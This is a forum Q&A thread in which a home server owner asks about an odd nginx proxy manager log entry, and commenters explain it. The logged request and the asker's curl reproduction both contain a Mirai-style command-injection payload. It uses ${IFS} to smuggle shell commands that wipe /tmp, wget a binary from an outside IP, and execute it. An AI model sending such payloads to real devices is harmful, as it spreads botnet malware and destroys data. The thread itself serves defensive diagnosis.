# Weird hack attempt nginx proxy manager and photoprism drives me nuts

Tags: proxy, docker, nginx

I have a logged http request in nginx logs which drives me nuts because I don't understand how it's finding its way into the logs:

```
[03/Jul/2023:13:45:04 +0000] 400 - GET http localhost "/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.95.196.149/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;" [Client 59.135.85.88] [Length 252] [Gzip -] "-" "-"
```

My current configuration is:

- two docker containers: nginx proxy manager and photoprism
- the only port open on the router is 443 (it's forwarded to 443 on nginx proxy manager docker container)
- no SSL certificate (so the configuration is actually invalid without the certificate and I can't get to anything from outside my home network using hostname or ip as NPM is blocking hand shake per default I think)
- one single host is proxied to photoprism (using host ip) which runs in a docker container on the host on port 2342

[image]

How is this possible, where does it come from and how come it says http and localhost...

Comment: *"so the configuration is actually invalid without the certificate"* - it is unusual to have plain HTTP on port 443 but it is not invalid. Try to access it with `http://example.com:443`, i.e. enforce plain HTTP on port 443.

Comment: The entries you see can likely be produced with something like `curl 'http://localhost:443/bin/zhttpd/...' --resolve localhost:your.ip.address`

Comment: Man you're my hero! Thanks a lot, I was somehow fixated on the wrong thing. I've now managed to produce exactly the same log entry with this curl command

`curl -H "Host: localhost" -H "User-Agent:" -X GET "http://hostname:443/bin/zhttpd/$\{IFS\}cd$\{IFS\}/tmp;$\{IFS\}rm$\{IFS\}-rf$\{IFS\}*;$\{IFS\}wget$\{IFS\}http://whatevrer/mips;$\{IFS\}chmod$\{IFS\}777$\{IFS\}mips;$\{IFS\}./mips$\{IFS\}zyxel.selfrep;"`

I could not reach anything from the browser and it looks like they change the host to localhost.

Comment: The request is an attempt to do remote command execution. The  `wget http://103.95.196.149/mips` is loading the binary for the Mirai botnet and once successfully infected it will try to infect more systems from there. You can check this URL with virustotal.

Comment: @Steffen Ullrich Thanks for your help!

Now I'm trying to think the whole request through:

An http request from outside goes to port 443 on the router through to the 443 on the nginx proxy manager. default.conf contains this directive:

`server { listen 443 ssl; listen [::]:443 ssl;

....
}`

Is this the one the request is hitting against? So it basically stops at the first line because it's not an SSL request "listen 443 ssl" and returns with error 400.

Is this correct that it does not even get to the proxy directive that is listening on port 80?

Comment: I'm not sure how nginx behaves if you set the configuration to ssl but does not set a certificate. I recommend that you check your error log if there are related messages. Anyway, digging deeper into the nginx setup is probably no longer a security question.